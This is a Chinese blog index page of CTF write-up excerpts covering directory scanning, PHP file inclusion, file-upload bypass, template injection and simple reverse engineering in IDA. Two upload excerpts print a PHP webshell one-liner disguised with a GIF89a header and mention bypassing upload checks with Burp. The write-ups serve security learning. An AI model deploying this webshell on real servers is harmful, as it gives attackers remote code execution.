摘要: 启动靶机,打开环境, 这个网页写的还真不错,真想白嫖 好言归正传,拿到这个网页后,根据提示利用dirsearch-master扫一下目录,这个工具可以去github上下载一手 打开dos窗口,然后用dirsearch.py "url" -e*命令扫一下目录 然后发现了www.zip,然后下载下来。解 阅读全文
posted @ 2020-10-15 22:28 AW_SOLE 阅读(364) 评论(0) 推荐(0)
摘要: 当我们打开环境的时候看到的是一段很长的代码 1 <?php 2 $text = $_GET["text"]; 3 $file = $_GET["file"]; 4 $password = $_GET["password"]; //判断变量是否存在并且是否写入了welcome to the zjctf 阅读全文
posted @ 2020-10-15 18:25 AW_SOLE 阅读(216) 评论(0) 推荐(0)
摘要: 启动靶机,打开环境 又是一道Upload题。 根据上一道题的思路来, 先上传一个phtml文件 GIF89a <script language="php">eval($_POST['shell']);</script> 上面显示Not image 那我们用bp来抓一下包。 然后修改一下格式 然后这里 阅读全文
posted @ 2020-10-15 14:33 AW_SOLE 阅读(490) 评论(0) 推荐(0)
摘要: 启动环境,打开靶机 既然,题目都叫Upload,那肯定是要上传文件的嘛。 然后我们先写一个phtml文件 GIF89a <script language="php">eval($_POST['shell']);</script> 然后上传, 出错,发现不允许上传phtml文件 猜测这应该是前端js验 阅读全文
posted @ 2020-10-15 14:04 AW_SOLE 阅读(449) 评论(0) 推荐(0)
摘要: 当我们打开网页的时候,看见了 那我们都来查看一下吧。 通过第一个条件我们得知,flag是存放在里的。 而第二个条件说的render,它其实是python中的一个渲染函数,也就是一种模板,通过调用的参数不同,生成不同的网页,如果用户对render内容可控,不仅可以注入XSS代码,而且还可以通过{{}} 阅读全文
posted @ 2020-10-15 13:40 AW_SOLE 阅读(115) 评论(0) 推荐(0)
摘要: 启动靶机,下载并解压压缩包 使用ida打开,shift+f12直接查看字符串 然后双击跟进,查看伪代码 对应str2 查看str2,则flag就为{hello_world} 最后是要将o变为0的 阅读全文
posted @ 2020-10-15 01:24 AW_SOLE 阅读(97) 评论(0) 推荐(0)
摘要: 启动靶机后,先把压缩包解压下来, 然后将easyre.exe拖到idaq64内, 然后按shift+f12,就找到flag了 或者是在找到main()函数,然后按f5,查看伪代码,也能找到flag 阅读全文
posted @ 2020-10-15 00:56 AW_SOLE 阅读(373) 评论(0) 推荐(0)